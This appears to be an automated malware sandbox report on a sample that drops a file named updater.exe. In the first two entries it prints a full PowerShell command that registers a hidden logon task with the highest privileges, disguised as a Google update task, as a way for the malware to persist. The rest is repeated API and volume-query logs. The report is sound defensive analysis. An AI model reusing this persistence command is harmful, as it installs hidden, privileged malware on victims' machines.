Source: C:\Users\user\Desktop\h2qWqtD73F.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe <#polrad#> if([system.environment]::osversion.version -lt [system.version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'googleupdatetaskmachineqc' /tr '''c:\users\user\appdata\roaming\google\chrome\updater.exe''' } else { register-scheduledtask -action (new-scheduledtaskaction -execute 'c:\users\user\appdata\roaming\google\chrome\updater.exe') -trigger (new-scheduledtasktrigger -atlogon) -settings (new-scheduledtasksettingsset -allowstartifonbatteries -disallowhardterminate -dontstopifgoingonbatteries -dontstoponidleend -executiontimelimit (new-timespan -days 1000)) -taskname 'googleupdatetaskmachineqc' -runlevel 'highest' -force; }	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe <#polrad#> if([system.environment]::osversion.version -lt [system.version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'googleupdatetaskmachineqc' /tr '''c:\users\user\appdata\roaming\google\chrome\updater.exe''' } else { register-scheduledtask -action (new-scheduledtaskaction -execute 'c:\users\user\appdata\roaming\google\chrome\updater.exe') -trigger (new-scheduledtasktrigger -atlogon) -settings (new-scheduledtasksettingsset -allowstartifonbatteries -disallowhardterminate -dontstopifgoingonbatteries -dontstoponidleend -executiontimelimit (new-timespan -days 1000)) -taskname 'googleupdatetaskmachineqc' -runlevel 'highest' -force; }	Jump to behavior

Source: C:\Windows\System32\dialer.exe

Code function: 5_2_00007FF67E6C1C64 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,

5_2_00007FF67E6C1C64

Source: C:\Windows\System32\dialer.exe

Code function: 5_2_00007FF67E6C1C64 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,

5_2_00007FF67E6C1C64

Source: dwm.exe, 0000000B.00000002.2683605583.000001C6C8720000.00000004.00000020.00020000.00000000.sdmp, dwm.exe, 0000000B.00000000.1359737215.000001C6C8720000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: winlogon.exe, 00000008.00000000.1345809971.000002EA8AB50000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000008.00000002.2652974543.000002EA8AB50000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 0000000B.00000002.2689611402.000001C6C8D50000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: winlogon.exe, 00000008.00000000.1345809971.000002EA8AB50000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000008.00000002.2652974543.000002EA8AB50000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 0000000B.00000002.2689611402.000001C6C8D50000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: winlogon.exe, 00000008.00000000.1345809971.000002EA8AB50000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000008.00000002.2652974543.000002EA8AB50000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 0000000B.00000002.2689611402.000001C6C8D50000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: winlogon.exe, 00000008.00000000.1345809971.000002EA8AB50000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000008.00000002.2652974543.000002EA8AB50000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 0000000B.00000002.2689611402.000001C6C8D50000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: yProgram Manager

Source: C:\Windows\System32\winlogon.exe

Code function: 8_2_000002EA8A6714A0 cpuid

8_2_000002EA8A6714A0

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
